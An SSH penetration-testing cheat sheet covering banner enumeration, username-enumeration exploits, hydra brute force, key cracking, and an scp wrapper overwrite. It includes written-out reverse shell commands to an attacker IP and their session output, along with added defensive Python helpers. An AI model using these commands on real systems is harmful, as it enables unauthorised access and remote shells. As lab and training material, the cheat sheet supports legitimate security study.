SSH (22)
SSH is a cryptographic network remote administration protocol. It's built on top of TCP.
It's widely used for secure remote administration, file transfers and tunnelling.
SSH can be used for:
- Encrypted communication
- Authentication methods
- Port forwarding/tunnelling
- Secure file transfer
If we find a way to authenticate to it, we can execute commands as that user.
METHODOLOGY
- Does this SSH server have any public exploits?
- CVE-2008-0166 (Debian predictable OpenSSL PRNG): keys generated between September 2006 and May 13th, 2008 may be affected, and because only a small set of keys was possible they can be brute-forced (Predictable PRNG Brute Force SSH).
- OpenSSH 2.3 < 7.7 - Username Enumeration - https://www.exploit-db.com/exploits/45233
- The SSH server banner often reveals the Operating System of the machine: look up which OS release ships that specific package version. For example, OpenSSH_8.2p1 Ubuntu-4ubuntu0.1 corresponds to Ubuntu focal (20.04), according to Launchpad: https://launchpad.net/ubuntu/+source/openssh/1:8.2p1-4ubuntu0.1
- If we have a potential user, we may brute-force their password. Note that brute-forcing SSH is very slow!
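An added helper (not part of the original cheat sheet) that automates the banner triage described above: it parses the version string an OpenSSH server announces, rebuilds the distribution package version the Launchpad lookup uses, and flags versions in the 2.3 up to 7.7 username-enumeration range. The sample banners are constructed; the range is read as 2.3 inclusive to 7.7 exclusive.

```python
import re

# Matches the identification string an OpenSSH server sends first, e.g. the page's
# "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1": version, optional patch level, optional
# "<Distro>-<package revision>" comment.
BANNER_RE = re.compile(
    r"^SSH-(?P<proto>[\d.]+)-OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)"
    r"(?P<patch>p\d+)?(?:\s+(?P<distro>[A-Za-z]+)-(?P<pkgrev>\S+))?"
)

def parse_banner(banner):
    """Split an OpenSSH banner into its parts; returns None for non-OpenSSH servers."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    info = {
        "protocol": m["proto"],
        "version": (int(m["major"]), int(m["minor"])),
        "patch": m["patch"] or "",
        "distro": m["distro"],
        "pkg_rev": m["pkgrev"],
    }
    # Package version as the distro's tracker lists it (without the Debian/Ubuntu epoch,
    # e.g. the "1:" in the Launchpad URL above, which the banner does not carry).
    if info["distro"] and info["pkg_rev"]:
        info["pkg_version"] = f"{m['major']}.{m['minor']}{info['patch']}-{info['pkg_rev']}"
    return info

def in_user_enum_range(version):
    """The methodology list's 'OpenSSH 2.3 < 7.7', read as 2.3 inclusive to 7.7 exclusive."""
    return (2, 3) <= version < (7, 7)

def triage_banner(banner):
    """Findings for one banner: an empty list means nothing stood out."""
    info = parse_banner(banner)
    if info is None:
        return ["not an OpenSSH banner: " + banner.strip()]
    findings = []
    if in_user_enum_range(info["version"]):
        findings.append("OpenSSH %d.%d is in the 2.3 < 7.7 username-enumeration range" % info["version"])
    if info.get("pkg_version"):
        findings.append("distro package %s %s: map it to an OS release on the distro's package tracker"
                        % (info["distro"], info["pkg_version"]))
    return findings

if __name__ == "__main__":
    # Constructed sample banners, including one non-OpenSSH server.
    for b in ("SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1", "SSH-2.0-OpenSSH_7.4", "SSH-2.0-dropbear_2019.78"):
        print(b, "->", triage_banner(b))
```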
MORE RESOURCES
- https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html#ssh---22
- https://book.hacktricks.xyz/pentesting/pentesting-ssh
- https://github.com/mchern1kov/pentest-everything/tree/master/enum_and_exploit/tcp-22-ssh
- https://pentestmonkey.net/cheat-sheet/ssh-cheat-sheet
Enumeration
Connect
ssh <user>@<ip> -p <port>
nmap
nmap -p 22 --script ssh-user-enum --script-args userdb=users.txt target-ip
Log in with a private key (an RSA key is shown; also consider ecdsa, ed25519, dsa and sshcom key types):
chmod 600 <id_rsa_file>
ssh <user>@<ip> -p <port> -i <id_rsa_file>
Obtained public key
cat id_rsa.pub
View the key types present on the target (e.g. id_ecdsa)
cat /etc/ssh/*.pub
ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK6SiUV5zqxqNJ9a/p9l+VpxxqiXnYri40OjXMExS/tP0EbTAEpojn4uXKOgR3oEaMmQVmI9QLPTehCFLNJ3iJo= root@example01
ssh-rsa ... USERZ@example #new user found in the key comment
Brute Force
With -u, hydra loops over users first: every username is tried against the first password in the list before it moves on to the next password.
hydra -V -f -L SecLists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.138.143 -u -vV
hydra -l userc -P /usr/share/wfuzz/wordlist/others/common_pass.txt 10.1.1.27 -t 4 ssh
hydra -L users.txt -p WallAskCharacter305 192.168.153.139 -t 4 ssh -s 42022
Use a colon-separated username:password pair on each line for an exact one-to-one mapping between username and password. This is worth running after everything else has been checked, as the brute-forcing method is different.
hydra -C SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt 192.168.207.183 ssh
Crackmapexec can be used but should only be a backup as it's generally a bit slower.
cme ssh <ip> -u <user> -p <passwords_file>
cme ssh <ip> -u <users_file> -p <passwords_file>
PuTTY Tools
Convert a PuTTY private key (.ppk format, here saved as keeper.txt) to OpenSSH format. First inspect the file; Encryption: none means the key has no passphrase:
cat keeper.txt
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
[6 base64 lines of public key omitted]
Private-Lines: 14
[14 base64 lines of private key omitted]
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
puttygen keeper.txt -O private-openssh -o id_rsa
chmod 600 id_rsa
ssh root@10.10.11.227 -i id_rsa
Execute a reverse shell payload on login, with a listener waiting on the attacking machine
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa USERB@10.11.1.141 -t 'bash -i >& /dev/tcp/192.168.119.140/443 0>&1'
nc -nvlp 443
Error: no matching key exchange method found
The server only offers legacy algorithms that current clients disable by default; re-enable them for this connection with -o options. Each continuation backslash needs a space before it, otherwise the shell joins the options into one argument:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
    -oHostKeyAlgorithms=+ssh-rsa \
    -oCiphers=+aes256-cbc \
    admin@10.11.1.252 -p 22000
Private key cracking
ssh2john id_ecdsa > id_ecdsa.hash
id_ecdsa:$sshng$6$16$0ef9e445850d777e7da427caa9b729cc$359$...$16$183
john --wordlist=/usr/share/wordlists/rockyou.txt id_ecdsa.hash
Errors
ssh2john id_rsa > id_rsa.hash
id_rsa has no password!
This means you are most likely using the private key for the wrong user; try running cat /etc/passwd to find other users to try it on. This error came from me trying a private key on the wrong user: a private key which has no password, yet a password was being asked for.
If you are failing to download files (e.g. Permission denied), try again with scp and the key:
scp -r -i id_rsa USERZ@192.168.214.149:/path/to/file/you/want .
RCE with scp
The key for userA is restricted to a forced command, scp_wrapper.sh, which only lets the key holder run scp (SSH_ORIGINAL_COMMAND holds whatever the client asked to run). Because the wrapper sits in userA's own home directory and scp into that directory is allowed, the key holder can overwrite it with a copy whose deny branch spawns a reverse shell. The wrapper as found:
kali@kali:~/home/userA$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
scp
;;
esac
Modified copy, with the deny branch replaced by a reverse shell:
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
bash -i >& /dev/tcp/192.168.18.11/443 0>&1
;;
esac
Upload the modified wrapper over the original, start a listener, then log in without a command so the deny branch fires:
scp -i .ssh/id_rsa scp_wrapper.sh userA@192.168.120.29:/home/userA/
kali@kali:~$ sudo nc -nlvp 443
kali@kali:~/home/userA$ ssh -i .ssh/id_rsa userA@192.168.120.29
PTY allocation request failed on channel 0
ACCESS DENIED.
connect to [192.168.118.11] from (UNKNOWN) [192.168.120.29] 48666
bash: cannot set terminal process group (932): Inappropriate ioctl for device
bash: no job control in this shell
userA@sorcerer:~$ id
id
uid=1003(userA) gid=1003(userA) groups=1003(userA)
userA@sorcerer:~$
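An added hardening counterpart (not the page's code) to the wrapper above, written in Python because a forced command can be any executable: it accepts only an exact scp upload into one directory, so neither a prefix match such as "scp;..." nor a target outside that directory (the wrapper itself, for instance) is ever executed. It assumes the script is installed root-owned outside the user's home and referenced with command="/usr/local/bin/scp_only.py" in authorized_keys; /srv/upload is a hypothetical upload root.

```python
import os
import shlex

UPLOAD_ROOT = "/srv/upload"   # hypothetical directory this key is allowed to write into

def vet_scp_command(original_command, upload_root=UPLOAD_ROOT):
    """Return the argv to exec for an allowed upload, or None to deny.
    Replaces the page's 'scp'*) prefix match with an exact, argument-by-argument check."""
    try:
        argv = shlex.split(original_command or "")
    except ValueError:                          # unbalanced quotes
        return None
    if not argv or argv[0] != "scp":            # exact program name: "scpfoo" and "scp;" fail
        return None
    mode, opts, paths = None, [], []
    for arg in argv[1:]:
        if arg in ("-t", "-f"):                 # remote-side scp: -t sink (upload), -f source
            mode = arg
        elif arg in ("-r", "-p", "-d", "-v"):   # harmless transfer options
            opts.append(arg)
        elif arg.startswith("-"):               # anything else, e.g. -S to run another program
            return None
        else:
            paths.append(arg)
    if mode != "-t" or len(paths) != 1:         # uploads only, exactly one target
        return None
    target = os.path.realpath(paths[0])         # collapses ../ and symlinks before the check
    if not paths[0].startswith("/") or os.path.commonpath([target, upload_root]) != upload_root:
        return None                             # outside the upload root (e.g. the wrapper itself)
    return ["scp"] + opts + ["-t", target]

if __name__ == "__main__":
    # Installed as the forced command, sshd hands us the client's request in this variable.
    argv = vet_scp_command(os.environ.get("SSH_ORIGINAL_COMMAND"))
    if argv is None:
        print("ACCESS DENIED.")
        raise SystemExit(1)
    os.execvp(argv[0], argv)
```

Against the page's attack, an SSH_ORIGINAL_COMMAND of scp -t /home/userA/ is refused because the target lies outside the upload root, so the wrapper cannot be replaced through the channel it guards.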
Generate keys
ssh-keygen -t rsa -b 4096
Find keys
cat ~/.ssh/id_rsa.pub
Connect without saving the key fingerprint
Host key checking exists to ensure the fingerprint hasn't changed: if it has, the machine may have been compromised (or replaced). It lets the client verify the authenticity of the machine it connects to by checking the host's public key. Pointing UserKnownHostsFile at /dev/null skips saving and comparing that fingerprint:
ssh -o "UserKnownHostsFile /dev/null" sshuser@10.0.0.1
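An added example (not from the original cheat sheet) that parses public key lines the way the enumeration section reads them, pulling out the key type, size and the comment that gave away the extra user, and that computes the SHA256 fingerprint ssh-keygen -l shows, so a host key can be checked against a pinned value instead of skipping known_hosts entirely. It uses the ecdsa key line from the enumeration section; the ssh-keyscan-style host line passed to host_key_matches is a constructed sample.

```python
import base64
import hashlib
import struct

PAGE_KEY_LINE = (  # the ecdsa public key line from this page's enumeration section
    "ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK6SiUV5zqxq"
    "NJ9a/p9l+VpxxqiXnYri40OjXMExS/tP0EbTAEpojn4uXKOgR3oEaMmQVmI9QLPTehCFLNJ3iJo= root@example01")

def read_string(blob, off):
    """SSH wire format: a big-endian uint32 length, then that many bytes (struct.error if cut short)."""
    (n,) = struct.unpack_from(">I", blob, off)
    if off + 4 + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[off + 4:off + 4 + n], off + 4 + n

def parse_pubkey_line(line):
    """Parse a '<type> <base64 blob> [comment]' line; ValueError if the blob contradicts the type."""
    parts = line.split(None, 2)
    if len(parts) < 2:
        raise ValueError("expected '<type> <base64 blob> [comment]'")
    declared, comment = parts[0], (parts[2] if len(parts) == 3 else "")
    blob = base64.b64decode(parts[1], validate=True)
    embedded, off = read_string(blob, 0)            # the blob starts with its own type string
    if embedded.decode() != declared:
        raise ValueError(f"type mismatch: line says {declared}, blob says {embedded.decode()}")
    info = {"type": declared, "comment": comment}
    if declared == "ssh-rsa":                        # mpint e, then mpint n
        _e, off = read_string(blob, off)
        n, off = read_string(blob, off)
        info["bits"] = int.from_bytes(n, "big").bit_length()
    elif declared.startswith("ecdsa-sha2-nistp"):    # curve name, then uncompressed point Q
        curve, off = read_string(blob, off)
        q, off = read_string(blob, off)
        bits = int(curve.decode()[len("nistp"):])
        if curve.decode() != declared[len("ecdsa-sha2-"):] or q[:1] != b"\x04" \
                or len(q) != 2 * ((bits + 7) // 8) + 1:
            raise ValueError("curve name or point encoding does not match the key type")
        info["curve"], info["bits"] = curve.decode(), bits
    elif declared == "ssh-ed25519":                  # raw 32-byte public key
        pk, off = read_string(blob, off)
        info["bits"] = len(pk) * 8
    # Same value ssh-keygen -l prints: base64(SHA-256(blob)) with the '=' padding removed.
    info["fingerprint"] = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return info

def host_key_matches(keyscan_line, pinned_fingerprint):
    """Compare an ssh-keyscan line ('host type blob') with a fingerprint recorded earlier."""
    return parse_pubkey_line(keyscan_line.split(None, 1)[1])["fingerprint"] == pinned_fingerprint
```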